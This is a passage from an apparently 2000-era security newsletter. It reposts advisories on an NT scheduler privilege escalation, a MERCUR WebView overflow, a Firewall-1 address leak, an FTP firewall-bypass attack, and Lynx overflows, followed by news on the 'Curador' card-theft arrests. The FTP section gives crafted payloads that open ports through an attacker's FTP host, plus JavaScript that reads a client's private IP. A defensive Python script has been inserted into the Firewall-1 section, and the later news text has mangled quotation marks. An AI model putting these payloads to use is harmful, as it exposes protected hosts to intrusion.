directed in the script.

Here comes the exploit. If an interactive login is present, and the same
drive letter is already mapped by a user, the net use in the scheduled
script will fail, as will the required hotfix or update. Not a pretty
picture in a large LAN whose security and stability may rely on timely
installation of these updates. This is the simplest "exploit".

Next we extend this a bit further: the user maps a drive letter in an
interactive login, and places in it a script with the same filename as that
called by the scheduled update, and makes sure the schedule user has
permissions to this file and network resource. All of this could be
performed by a non-privileged user. The schedule service will now execute
this script in the elevated user context, and the script could be
instructed to install a trojan, add the user to the local Admin group, or
whatever.

The bottom line is that this design flaw can be easily exploited to allow
any user with interactive login rights to a workstation to elevate himself
to the rights of the schedule user, which is often Administrator of the
workstation.

I have tested this on NT4 SP5 and 6a. (Note this is without IE5 installed,
just the built in AT scheduler). I have also tested this with all
combinations of Local and Domain accounts for both the scheduler and the
interactive user. I have tested it with and without persistent drive
mappings present for either user - in each case, whoever gets the login
first gets the drive letter.
@HWA

105.0 HNS:DoS Attack in MERCUR WebView
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client 1.0 where
they do not use proper bounds checking in the code which handles the GET
commands. The following all result in a Denial of Service against the
service in question. ...

DoS Attack in MERCUR WebView

Posted to BugTraq on March 15, 2000

USSR Advisory Code: USSR-2000036
Release Date: March 16, 2000
Systems Affected: MERCUR WebMail-Client Version 1.0 port (1080)

THE PROBLEM

UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client 1.0 where
they do not use proper bounds checking in the code which handles the GET
commands. The following all result in a Denial of Service against the
service in question.

Example:

http://hostip:1080/mmain.html&mail_user=(buffer)

Where [buffer] is approx. 1000 characters.

(0) Binary or source for this Exploit: http://www.ussrback.com/

Exploit: the Exploit crashes the remote machine service WebMail

Vendor Status: informed
Vendor Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/webview_e.html
Credit: USSRLABS

SOLUTION

Nothing yet.

@HWA

106.0 HNS:Problem with Firewall-1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

The Dartmouth College security group has uncovered a problem with Firewall-1
which could lead to the protected site handing out more IP address info than
intended. ..

Problem with Firewall-1

Posted to BugTraq on March 15, 2000

The Dartmouth College security group has uncovered a problem with Firewall-1
which could lead to the protected site handing out more IP address info than
intended.

Under certain nominal load conditions (CPU less than 40%, 200+ active
sessions) Firewall-1 will begin "leaking" packets with their private address
information intact. The result is that the receiving site will receive a
SYN=1 that it will be unable to respond to.
Once the client attempts a resend, the target network (or anyone in the
middle) can use the source port information to enumerate the client's true
IP address.

Here is a Snort trace which has been sanitized and formatted for easier
viewing:

Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S*****

So the first packet goes out with the private address information still in
place and SYN=1. When the client does not receive a reply, it retransmits
the SYN=1. Since FW-1 considers this to be part of the same session, the
same source port number is assigned. If the second packet gets translated
properly (as in these traces) the source port info can potentially be used
to map the legal IP address to the private address.

Of course the problem here is that a would-be bad guy now knows the
client's true IP address. If enough hosts are recorded, it's possible that
most of the internal network address space could be enumerated.

This problem has been noted on Firewall-1 versions 3.0b & 4.0. 4.1 has not
been checked but it's expected that the same problem may exist. We were
able to reproduce the problem on a Nokia IP440 and NT. I've seen this
problem on Solaris 2.6 as well, but do not have the data to back up the
statement.

A quick fix is to apply egress filtering to the border router and block all
private addressing that attempts to leak through. A how-to on egress can be
found at:

http://www.sans.org/y2k/egress.htm

Cheers all,
Chris

@HWA.
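As an added example (not part of Chris's post, and not Firewall-1 or Snort code), the Python below runs the detection a border-router operator would want over constructed Snort-style lines shaped like the trace above: it flags every SYN that left with an RFC1918 source address, which is exactly what the egress filter should have dropped, and reports the public-to-private mapping an outside observer could already have derived by matching the source ports of the leaked SYN and its translated retransmit. The trace lines, including a final lone public SYN that must not produce a mapping, are constructed for this example.

```python
import ipaddress
import re

# Constructed Snort-style lines in the shape of the sanitized trace in the post
# (the last line has no private-address twin and must not produce a mapping).
SAMPLE_TRACE = """\
Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S*****
Mar 9 14:30:02 200.200.200.5:5001 -> 192.168.1.5:80 SYN **S*****
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+SYN\b")

# The three RFC1918 blocks: addresses that must never be seen outside the firewall.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_line(line):
    """One Snort SYN line -> dict, or None for anything that does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": m["ts"], "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"])}


def is_rfc1918(addr):
    """True when addr falls in 10/8, 172.16/12 or 192.168/16."""
    a = ipaddress.ip_address(addr)
    return any(a in net for net in RFC1918)


def analyze(trace):
    """Return (leaks, mapping).

    leaks   - every SYN that arrived with an RFC1918 source address.
    mapping - public address -> set of private addresses, derived from a leaked
              SYN followed by a translated retransmit with the same source port
              and the same destination (the correlation the post describes).
    """
    leaks, mapping, pending = [], {}, {}
    for line in trace.splitlines():
        pkt = parse_line(line)
        if pkt is None:
            continue
        key = (pkt["sport"], pkt["dst"], pkt["dport"])
        if is_rfc1918(pkt["src"]):
            leaks.append((pkt["ts"], pkt["src"], pkt["sport"]))
            pending[key] = pkt["src"]          # wait for the translated retransmit
        elif key in pending:
            mapping.setdefault(pkt["src"], set()).add(pending.pop(key))
    return leaks, mapping


def egress_report(trace):
    """Report lines: which private sources leaked, and what that already exposed."""
    leaks, mapping = analyze(trace)
    out = [f"LEAK {ts} src={src} sport={sport} (should be dropped by egress filter)"
           for ts, src, sport in leaks]
    for pub, privs in sorted(mapping.items()):
        out.append(f"EXPOSED {pub} -> {', '.join(sorted(privs))}")
    return out


if __name__ == "__main__":
    print("\n".join(egress_report(SAMPLE_TRACE)))
```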
107.0 HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

Microsoft has just discovered a serious problem when a user attempts to
install the 128-bit security patch for Internet Explorer 5.0, 5.0a and 5.0b
on Windows 2000 as part of an IE5.0 IEAK package. After restarting the
system, users will not be able to logon to Windows 2000 ...

Freeze Distribution of IE 5.0, 5.0a, and 5.0b

Posted to BugTraq on March 15, 2000

Microsoft has just discovered a serious problem when a user attempts to
install the 128-bit security patch for Internet Explorer 5.0, 5.0a and 5.0b
on Windows 2000 as part of an IE5.0 IEAK package. After restarting the
system, users will not be able to logon to Windows 2000.

The instructions to incorporate the 128-bit security patch into IEAK
packages say you should use the command line switches: "/q:a /r:n /n:v"

The /n:v switch when used with ie5dom.exe (the 128-bit security patch for
5.0x) causes important security files on Windows 2000 to be replaced with
older files, preventing users from logging on.

Installations created using IEAK 5.0 for Windows 95, Windows 98, and
Windows NT4 systems with the ie5dom.exe, and these command line parameters
specified, are not affected.

It is critical that you freeze distribution of IE 5.0, 5.0a or 5.0b builds
that incorporate the 128-bit security patch with these switches. Please
take immediate action to help prevent more customers from encountering this
issue.

Please check http://www.microsoft.com/windows/ieak/en/support/faq/default.asp
and Microsoft Knowledge Base (KB) article Q255669 for updates to this issue.

Note: It may take 24 hours from the original issuance of this bulletin for
the Microsoft Knowledge Base (KB) article related to this issue to be
visible.

We sincerely apologize for this inconvenience and thank you in advance for
your help in protecting end users.
Thank you,

The IEAK Product Team

Checking to see if you have included this command-line switch:

To check a package for this issue:

Open your IEAK package in the IEAK Wizard and go to the Custom Components
screen. Examine each custom component. If you have included ie5dom.exe as a
custom component, check the command line switches for '/R:N /Q:A /N:V'

*OR*

If you don't have the IEAK Wizard available to you:

1) Extract your custom IE 5.0x package by running this command line:
   'ie5setup.exe /c /t:'

2) Browse to the directory. Open 'iesetup.cif' in Notepad.

3) Look for a section like this:

   [CUSTOM0]
   SectionType=Component
   DisplayName='128-bit Security'
   URL1='Ie5dom.exe',2
   GUID=128PATCH
   Command1='Ie5dom.exe'
   Switches1='/R:N /Q:A /N:V'
   Type1=2
   UninstallKey=''
   Version=
   Size=216
   Platform=win95,win98,nt4,nt5,
   Modes='0,1,2'
   Details='128-bit Securiy'
   Group=CustItems
   Priority=500
   UIVisible=0

4) Examine for: Switches1='/R:N /Q:A /N:V'

If you have this switch listed, immediately freeze distribution of this
package!!!

@HWA

108.0 HNS:Extending the FTP "ALG" vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

It is possible to cause many firewalls to open arbitrary ports allowing
external hosts to connect to "protected" clients. In this case, it is done
by fooling the protected client into sending a specially crafted FTP request
through the firewall, which it misinterprets as a legitimate FTP "PORT"
command ...

Extending the FTP "ALG" vulnerability

Posted to BugTraq on March 15, 2000

Author: Mikael Olsson, EnterNet Sweden mikael.olsson@enternet.se
Original Date: 2000-03-10
Originally posted to: Bugtraq, Vuln-dev (BID 1045)
Vendor contacted: Nope, sorry, too many.
Updated: 2000-03-14
- Added browser-specific info
- Begun writing a list of firewalls expected to be vulnerable
- Rewrote a couple of paragraphs that were causing much head scratching

Synopsis

It is possible to cause many firewalls to open arbitrary ports allowing
external hosts to connect to "protected" clients. In this case, it is done
by fooling the protected client into sending a specially crafted FTP request
through the firewall, which it misinterprets as a legitimate FTP "PORT"
command.

Basic idea : how to open arbitrary ports against a client

* Send a HTML email to an HTML-enabled mail reader containing the tag

  You could also conceivably plant a web page somewhere on a server
  containing this link.

  Please reference CERT advisory CA-2000-02: Malicious HTML Tags Embedded in
  Client Web Requests
  http://www.cert.org/advisories/CA-2000-02.html

* Balance the number of A so that the PORT command will begin on a new
  packet boundary. This may also be done by having the server use a low TCP
  MSS to decrease the number of A's that one has to add.

* The firewall in question will incorrectly parse the resulting

    RETR /aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139

  as first a RETR command and then a PORT command and open port 139 against
  your address (1.2.3.4 in this case)

* Now the server ftp.rooted.com can connect to the client on port 139. Ouch.

Before you ask: No, it does not have to be port 139. It can be any port.
Some firewalls disallow "known server ports" for these connections; such
ports cannot be used, but I'm betting there are plenty other ports that can
be used in such cases.

Address translation playing games

You have to know the IP address of the client in order to fool the firewall
into opening the port. If the client is not dynamically NATed, this is easy.
If the client IS dynamically NATed, this is a bit harder.

How to make it work through address translation

There are several ways to figure out what the private address is.
Here's two:

* Send an email to the address in question containing an img src
  ftp://ftp.rooted.com:23456 and hope that the firewall won't realise that
  port 23456 is FTP. PORT commands won't be translated this way, so the
  private IP address will be exposed. This assumes that 23456 is allowed
  through the firewall and that it won't attempt to parse FTP command data
  on that port.

* Send an email with a link to a web page that contains javascript that
  extracts the private IP address and posts it to the server. The javascript
  code below works on Netscape; I don't know what the equivalent is for
  MSIE.

    var tool=java.awt.Toolkit.getDefaultToolkit();
    addr=java.net.InetAddress.getLocalHost();
    ip=addr.getHostAddress();

Once we know about the IP address, we can adjust the img src so that it is
valid for that specific internal client.

The dynamic translation will also likely change the port number opened on
the NAT:ed public address, but that's ok. All we have to do is have our
fake FTP server read the command packet containing the PORT command, as
changed by the firewall, and we'll know what public address and port to
connect to in order to get to our desired port on the "protected" client.

I think I've heard about reverse firewall penetration before

Yeah, the idea of internal users fooling a firewall to let them out isn't
new, but the scope of this vulnerability is "new" IMHO. Basically, you can
get at anyone with a browser or HTML-enabled mail reader protected by
firewalls that have more than 50% market coverage. That's bad.

What about Checkpoint's FTP PASV fix for FW-1?

Checkpoint's fix for FW-1 is to make sure that every packet in the command
stream ends with CRLF (0x0a 0x0d in hex). That would help against the above
attack, but not if we modify it a wee bit:

  src="ftp://ftp.rooted.com/aaaaaaa%0a%0dPORT 1,2,3,4,0,139"

Ouch. This WILL work in Netscape v4.7 (I've verified it using a network
sniffer, anyone care for a packet dump?).
The firewall will see this as two separate commands:

  RETR aaaaaaaaaa
  PORT 1,2,3,4,0,139

which means that poorly implemented proxies are likely to be vulnerable as
well.

This in and of itself is a browser bug IMHO. Line feeds are not valid
characters in a file name.

Added: 2000-03-14
Apparently, this CRLF variant will _not_ work in MSIE (version unknown?).
It's doing the right thing: stripping out the CRLF. (Second hand info, I
have not verified MSIE's behaviour)

No information on other browsers or mail readers.

Other fixes?

I haven't seen other firewall vendors make public claims that they protect
against any of these attacks. Cisco is apparently working on a fix for PIX,
but it's taking time, so I'm guessing they're doing it the right way -
since doing it the right way really does take quite a bit of time.

It would seem like all the others are silently going to sneak fixes into
their upcoming updates and pretend like they never were vulnerable in the
first place. Grumble.

Added: 2000-03-14
I suspect that FW-1's security servers may disable this attack. (Dunno, I'm
not an FW-1 user)

What firewalls are likely to be vulnerable?

This specific attack is likely to work against most "stateful inspection"
firewalls with poorly implemented application layer filters. This probably
includes most products out there. It may also affect poorly implemented
"proxies" when the CRLF is added before the PORT command as described
above.

Added: 2000-03-14

Checkpoint FW-1 v3 is likely to allow connections on most ports 1024-65535
with full bidirectional communication

Checkpoint FW-1 v4 is likely to allow connection on most ports 1024-65535
with only unidirectional communication

Cisco PIX is likely to allow connections to any port with full
bidirectional communication

Linux's ip_masq_ftp module is _really_ easy to fool, according to Solar
Designer. It will accept a "PORT" command anywhere in a packet.
This means that even this is likely to work:

  "http://rooted.com:21/PORT 1,2,3,4,0,139"

This is likely NOT a complete list.

And no, I'm not going to get in touch with vendors and report the
vulnerability. There are just too many that are likely to be affected.

"The great picture"

Other protocols than FTP are likely to be affected by this type of
vulnerability - pretty much any protocol that opens up ephemeral ports
after the initial command session. A couple that come to mind are:

* Oracle SQL*Net (versions using separate data channels)
* RealAudio/Video (secondary UDP channel)
* H.323 (NetMeeting et al)

THIS IS NOT A COMPLETE LIST. Those were just a couple of common ones off
the top of my head.

Workarounds to this specific vulnerability

* Disable active FTP. Errrr, wait. The fix for the server side vulnerability
  was to disable passive FTP. Let's rephrase that:

* Disable FTP altogether. Block port 21. Disable FTP Application Layer
  Filters on all ports in your firewall.

* If you can't change the settings in your firewall, set the "FTP Proxy"
  setting in your browser/HTML-enabled mail reader to some address that
  doesn't exist, like 127.0.0.2. After this change, your browser won't be
  able to connect anywhere using FTP. (From Solar Designer: This does not
  help if you're using ip_masq_ftp, since it'll be fooled by HTTP looking
  like FTP.)

@HWA

109.0 FreeBSD-SA-00:08: Lynx overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by FProphet

Source: Bugtraq

Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Date: Wed, 15 Mar 2000 09:34:43 -0800
Reply-To: security-officer@freebsd.org
Sender: Bugtraq List
Comments: RFC822 error: FROM field duplicated. Last occurrence was retained.
From: FreeBSD Security Officer
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:08                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          Lynx ports contain numerous buffer overflows

Category:       ports
Module:         lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current
Announced:      2000-03-15
Affects:        Ports collection before the correction date.
Corrected:      See below.
FreeBSD only:   NO

I.   Background

Lynx is a popular text-mode WWW browser, available in several versions
including SSL support and Japanese language localization.

II.  Problem Description

The lynx software is written in a very insecure style and contains numerous
potential and several proven security vulnerabilities (publicized on the
BugTraq mailing list) exploitable by a malicious server.

The lynx ports are not installed by default, nor are they "part of FreeBSD"
as such: they are part of the FreeBSD ports collection, which contains over
3100 third-party applications in a ready-to-install format. FreeBSD makes
no claim about the security of these third-party applications, although an
effort is underway to provide a security audit of the most
security-critical ports.

III. Impact

A malicious server which is visited by a user with the lynx browser can
exploit the browser security holes in order to execute arbitrary code as
the local user.

If you have not chosen to install any of the
lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages, then
your system is not vulnerable.

IV.  Workaround

Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports, if you
have installed them.

V.   Solution

Unfortunately, there is no simple fix to the security problems with the
lynx code: it will require a full review by the lynx development team and
recoding of the affected sections with a more security-conscious attitude.
In the meantime, there are two other text-mode WWW browsers available in
FreeBSD ports: www/w3m (also available in www/w3m-ssl for an SSL-enabled
version, and japanese/w3m for Japanese-localization) and www/links. Note
that the FreeBSD Security Officer does not make any recommendation about
the security of these two browsers - in particular, they both appear to
contain potential security risks, and a full audit has not been performed,
but at present no proven security holes are known. User beware - please
watch for future security advisories which will publicize any such
vulnerabilities discovered in these ports.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOM/JklUuHi5z0oilAQEbzQP+K5HbTRk40fmb+pKOcUDD/r4ofcrkWtXn
Ya7PT/ALXvUnohm/jqKofNk9cXK1EspbgHb9N1OJZEzcYUAy378WpQgWh4uxKQa7
+541CwFPPIbWfJQJCOaUODN2qwnXdqXMj6noCKRMN0c3tBRG6R2zEfVaM1vMNS1+
+vcp5WAqDu4=
=dtMU
-----END PGP SIGNATURE-----

@HWA

110.0 Curador? BUSTED
~~~~~~~~~~~~~~~~~~~~~

Contributed by Abattis (Wired) and MerXor (MSNBC)
Follow-ups by Cruci. (MSNBC) more from HNN in section 119.0

-=-

Sources: Wired, MSNBC

http://www.wired.com/news/business/0,1367,35186,00.html

Alleged Hackers Arrested

Reuters
2:05 p.m. Mar. 24, 2000 PST

The FBI said Friday that two 18-year-olds had been arrested in Wales for
allegedly hacking into nine e-commerce websites around the world and
stealing credit card information.

The losses connected with the intrusions on websites in the United States,
Canada, Thailand, Japan, and Britain could exceed US$3 million, the FBI said
in a news release.

It said the theft of credit card information related to more than 26,000
accounts, the alleged scheme involved the disclosure of the data on the
Internet, and that the accused hackers used the screen name "Curador."

The two youths, who cannot be identified under British law, were arrested
Thursday by the Dyfed-Powys Police Service in Wales for violating Britain's
Computer Misuse Act, the FBI said.
The arrests stemmed from an FBI investigation conducted with the Welsh
police, the Royal Canadian Mounted Police, and Internet security
consultants, the FBI said, adding that the international banking and credit
card industry also provided substantial cooperation.

The FBI still is investigating last month's wave of cyber attacks that
disrupted some of the Internet's most popular sites. The FBI has yet to make
any arrests or bring any charges involving those attacks.

The FBI's own website was attacked March 14, the same day the agency
celebrated the 50th anniversary of its "Ten Most Wanted Fugitives" list,
which is publicized on the site, FBI officials said.

-=-

MSNBC; http://www.msnbc.com/news/386402.asp

Consultant was key to 'Curador' bust

The FBI crowed, but security specialist led police to Wales

By Mike Brunker
MSNBC

March 27 — While the FBI was quick to take credit for the arrest last week
of two teen-agers who allegedly stole information on 26,000 credit cards
from Internet retailers, a Canadian computer security consultant working
with British authorities tracked the suspects back to their small village
in Wales before the U.S. agency even got involved, MSNBC.com has learned.

A PRESS RELEASE issued Friday by the FBI said the arrests of the two
18-year-olds "came as a direct result of an FBI investigation." It added
that unidentified Internet security consultants had assisted in the case,
but nowhere did it mention Chris Davis of HeXedit Network Security Inc. of
Ottawa, Ontario, who worked for nearly two months assembling the evidence
that led authorities to the suspects.

In interviews with numerous news organizations, including MSNBC.com, after
the announcement, the FBI's Michael Vatis said the arrests should serve as a
warning to others who would use the Internet to steal. "It's important to
say that anyone who underestimates the skill of our agents ... does so at
their own peril," he said.
FBI PLAYED LIMITED ROLE

But interviews with Davis and other participants in the case show that the
FBI's role in the investigation of "Curador" was limited.

"They (the FBI) did get involved fairly late," Davis said Monday. "By the
time they got involved, (British police) had phone numbers, home addresses
and all that."

Phone calls to the National Infrastructure Protection Center, which Vatis
heads, were not returned Monday. A spokesman for the FBI declined to
comment.

"In anything like this, it really doesn't serve any purpose to go back and
try to heap credit one way or the other," said the spokesman, Paul Bresson.
"I think the facts speak for themselves."

But officials of Promobility.net, a wireless phone seller in Ontario that
was among the sites hit by "Curador," confirmed Davis' account.

"That is 100 percent accurate," spokesman Eric Geiler said. "He could have
knocked on [the suspects'] doors two weeks before the FBI did."

Davis, who has been a computer security consultant for nearly four years,
said he got involved in the case in early February after reading a boastful
post from "Curador" — the online alias that authorities say was jointly
used by the two 18-year-old suspects — on HackerNews.com about the theft of
credit card information from two e-merchants. The credit card information
was subsequently posted on a Web site by "Curador," who said he took the
action to publicize the lack of security at many e-commerce sites.

'THAT'S PRETTY LOW'

"I read the boast and I thought, 'That's pretty low,'" said Davis. "I
checked and both sites seemed like fairly small mom-and-pop type operations
and I felt sorry for them. So I fired off an e-mail and said, 'I'll help
you secure your site.' They wrote back and said they had no idea they'd
even been hit (by hackers)."

Both Promobility.net and Ltamedia.com, a Knoxville, Tenn., seller of
"life-enhancing products,"
agreed to turn over their computer logs to Davis so he could determine how
the intruders had gained entry to their systems and close the security
holes.

Looking through the logs, Davis discovered that the intrusions were
accomplished using two known security holes in Microsoft's Internet
Information Server, or IIS. While Microsoft had issued "patches" to correct
the holes months earlier, none of the nine Web sites in the United States,
Canada, Thailand, Japan and the United Kingdom that were hit by "Curador"
had updated their software to eliminate the problem. (Microsoft is a
partner in MSNBC.com.)

While he could have simply fixed the flaws and returned to his paying jobs,
Davis found himself growing increasingly fascinated by the case and pressed
on. By analyzing e-mail sent through a free service that the hackers
wrongly thought would shield the IP address, Davis was quickly able to
determine that "Curador" was using an Internet service provider in England.

He then contacted Scotland Yard, which referred him to police in South
Yorkshire, who determined from records obtained from the ISP that the
"crackers," the term for computer criminals preferred by law-abiding
hackers, were in Wales.

SEARCH NARROWS TO TWO HOUSES

Soon, the British investigators tightened the circle to the tiny fishing
village of Clynderwen, population 500, and ultimately to two houses in the
village.

It was then, Davis said, that he heard from the FBI, which learned from the
Royal Canadian Mounted Police that he was working on the case while
investigating the thefts from U.S. Web sites.

"They were able to quickly obtain logs from everybody who had been affected
in the U.S. and I explained how 'Curador' had broken in, showing them,
'Here's the line from the log, here's how he exploited the security
vulnerability.'"

The FBI, working with the RCMP and the Welsh Dyfed-Powys Police Service,
orchestrated the arrests on Thursday of the 18-year-old suspects.
The teenagers were questioned for 12 hours after their arrest before being released on bail as the investigation continues, Welsh police said Monday. In accordance with British law, neither of the suspects was publicly identified. But one, Raphael Gray, has given numerous interviews since his release to say that he had acted only to highlight the lack of security on many retail Web sites. .I have done the honest thing, but I have been ignored,. he was quoted as saying by the Sunday Telegraph of London. .That’s why I posted the information on the Internet.. CURADOR’S CLAIMS Authorities have not identified the nine e-commerce sites they say were burgled, but according to .Curador’s. Web sites others include Feelgood Falls; Sales Gate; Shopping Thailand; Vision Computers; NTD Media and the American Society of Clinical Pathologists. Gray has maintained in interviews since his arrest that neither he nor his friend had used the stolen credit card data for personal gain — an assertion backed up by a British businessman who said he hired Gray to run his e-commerce site. .I’d have to give him money to buy lunch or get a haircut,. the businessman told MSNBC.com on Monday. The businessman, who contacted MSNBC.com, agreed to talk about Gray on the condition that neither he nor his Web site be identified because he feared it would be bad for business. His account could not be independently confirmed, but his description of Gray was consistent with other published accounts. The businessman said Gray worked part-time for him for two to three months and was in charge of the company’s Web site, which sells video games. He was fired on March 2 because of chronic absenteeism, he said. ‘HE KNEW HIS STUFF’ .He was very good at his job,. said the man. .Didn’t turn up very often and his personal hygiene wasn’t too good, but he knew his stuff. .He worked developing my company’s e-commerce site, which he claimed was going to be the most secure in the business. 
What I didn’t realize was that I had one of the world’s biggest credit card hackers looking after my customers.. Meanwhile, a claim by Gray that a credit card belonging to Microsoft founder Bill Gates was among the credit cards he and his friend are accused of stealing was determined to be false on Monday. Gray told the Sunday Telegraph that he had sent information on a number of the cards, including Gates’ card, to a U.S. Web site registered to NBC. (NBC is a partner in MSNBC.com.) But examination of one of the Web sites posted by .Curador. showed an entry about William F. Gates. The Microsoft founder’s name is William H. Gates. The credit card number listed also had too few digits to be valid, and both Microsoft’s address and Gates’ e-mail address were incorrect. Gray and his friend could face charges under Britain’s Computer Misuse Act of 1990. They also could eventually be extradited to face charges in the United States, the FBI’s Vatis told MSNBC.com on Friday. .The primary consideration is what’s in the interest of justice,. said Vatis. .... We have obviously been investigating violations of U.S. federal criminal law.. The teens are alleged to have caused losses that Vatis said could amount to more than $3 million, based on the cost of canceling the 26,000 credit card accounts and issuing new cards. And Vatis said that was .just one measure of possible loss.. Other costs could arise from any fraudulent use of the credit card numbers, as well as the expense of repairing compromised Web sites, he said. Live Map: Clynderwen The arrests in Wales appear to represent the first major international response to a rapidly growing field in computer crime. Earlier this month, in response to an MSNBC.com investigation of international online credit card theft, spokesmen for the FBI and other organizations involved in fighting cybercrime said they could not recall any past prosecutions in such matters. 
On Friday, Vatis said he could easily think of .international hacking incidents. that have led to prosecutions, but not in the context of online credit card information. Many such cases are under investigation, he said. Vatis said the international hurdles to investigating Internet crime were not as high as some people might think, contending that the FBI was .building more and more bridges every day. with law enforcement agencies in other countries. -=- MSNBC supplimentary; March 24th Can hackers kill credit cards? Spate of e-commerce intrusions might mean a new form of payment system will come sooner than expected By Bob Sullivan MSNBC March 24 — He calls himself .The Saint of E-commerce.. Two months ago, .Curador. started posting his catalog of stolen credit card numbers on his Web page. He stole database after database from a variety of e-commerce sites, each time updating his site, then gleefully mailing notification to reporters. He topped 25,000 records from 13 Web sites. Despite all that the financial risk and all that violation of personal privacy, no one could stop him. But now authorities in Wales have arrested two 18-year-olds on charges related to the Curador thefts. AUTHORITIES, OF COURSE, had always removed Curador’s Web site — at least a dozen times. No matter; he used the many free, anonymous Web hosting services available on the Internet. And as fast as his Web page is taken down, .Curador. would put up another one. The 18-year-old computer intruder, who also goes by the nickname .mind gimp,. told MSNBC in a telephone interview only that he was located somewhere in Europe. He wasn’t using the credit cards for financial gain, he said The self-proclaimed .Saint of E-commerce. said he simply wanted to embarrass the victim Web sites into employing better security. He promised to continue breaking into e-commerce sites and posting stolen numbers .until I don’t need to do it anymore or until I get arrested.. 
But until Thursday, as MSNBC’s Mike Brunker reported earlier this month, there hadn’t been a single reported arrest of a foreign credit card thief by U.S. authorities. Curador’s thefts are just another story in this year’s litany of tales surrounding online theft of personal and financial information. E-merchants are furiously fighting the battle to keep down fraud costs, and consumer confidence in Internet safety is continually shaken, with no apparent end in sight. So some experts think Curador may just be another nail in the coffin of a credit card system that was hardly designed for Internet purchasing. .Anyone who’s serious about this is getting a lesson. The wake-up call is here. The time is now,. said Stephen Orfei, vice president of electronic commerce and emerging technology for MasterCard International. Orfei is also the spokesperson for SETCo, the Visa- and MasterCard-backed organization pushing SET, a new payments protocol designed to limit electronic fraud. ‘HOW CAN WE DO MORE?’ The raging success of online thieves, some say, will force the hand of banks, merchants, credit card companies and consumers to change the way we spend money much sooner than we intended. The high-profile hacks have at least gotten the attention of merchants, said Alyxia Do, electronic payment and smart card analyst with Frost & Sullivan. .It seems that there have been a greater number of queries coming in,. she said. .It began with the CD Universe break-in and it has just continued to be in the news. I have heard more and more merchants are going back to Visa and MasterCard and asking, ‘How can we do more?’ . The stakes are higher for merchants than consumers. While consumers face a limited liability of $50 and a paperwork hassle, online merchants must write off credit card theft as .acceptable loss.. Hard data on how bad losses are is impossible to find, but anecdotally some industries relate fraud rates as high as 40 percent. 
Merchants use inexact software to filter out potential fraudulent purchases, but that means they turn away legitimate sales, too. The mathematics are alarming. In fact, according to Joe Barrett, chairman of the Internet Fraud prevention Advisory Council, in some industries, merchants are turning away 20 percent of proposed sales. .You’re killing your business. You’d be better off taking every sale and self-insuring,. he said. SMART CARDS, FINALLY? "A number and a date and you can buy anything you want with it.. That’s how a teen-aged Internet credit card thief described to MSNBC the fundamental problem of using credit cards online. The familiar plastic currency was designed to be physically handed to merchants, who could at least make a cursory check to see if signatures on the card and the sales slip matched. Online, commerce is anonymous. There is no way to see who’s entering the credit card numbers into the Web page, an anonymity that heavily favors the fraud artists. Several technologies hope to tip the scales against thieves by implementing systems that require some real-world physical component when shopping online. Smart cards, the generic term for any plastic which includes an embedded microchip, are one promising solution. Smart cards, which identify the user through encrypted information embedded on the chip, must be inserted into a .card reader. attached to the computer. That means the card can’t be used for e-commerce unless the purchaser is currently holding it. A PIN number is also required, so a thief needs to physically have the card and a security code in order to use it. That’s not an insurmountable hurdle, but a far more difficult one than using .a number and a date.. Still, smart cards are 20 years old, and while there have been smatterings of adoption in Europe, trials of the technology in the U.S. have failed repeatedly. Consumers perceived them as inconvenient, and in the past they have been unmoved by the improvement in security. 
